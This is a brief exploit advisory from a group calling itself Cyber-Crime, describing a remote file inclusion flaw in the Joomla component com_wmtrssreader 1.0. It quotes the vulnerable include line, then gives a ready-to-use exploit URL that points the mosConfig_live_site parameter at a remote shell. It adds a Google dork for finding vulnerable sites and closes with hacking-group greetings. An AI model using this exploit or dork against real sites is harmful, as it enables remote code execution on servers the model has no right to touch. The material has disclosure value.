wmtrssreader joomla component 1.0 Remote File Include Vulnerability

[cyber-crime@xxxxxxxxxxxxxxxxxxx]

#########################################################################################################
# wmtrssreader joomla component 1.0 Remote File Include Vulnerability

 Component       : com_wmtrssreader version 1.0
 Download script : http://www.webmaster-tips.net/flash-rss-reader.html (you 
must register)
 Dicovered by    : Cyber-Crime
 Contact         : cyber-crime@xxxxxxxxxxx
 Orginal         : http://www.sibersavascilar.com/category/security

==================================================================================================================================

# Vulnerable found in 
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php


include( "$mosConfig_live_site/components/com_wmtrssreader/about.html" );


# Exploit

 
http://localhost/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll?


# google dork

 inurl:com_wmtrssreader

==================================================================================================================================

# Greetz :  www.sibersavascilar.com  www.sibersavascilar.net 
www.sibersavascilar.org


==================================================================================================================================

#########################################################################################################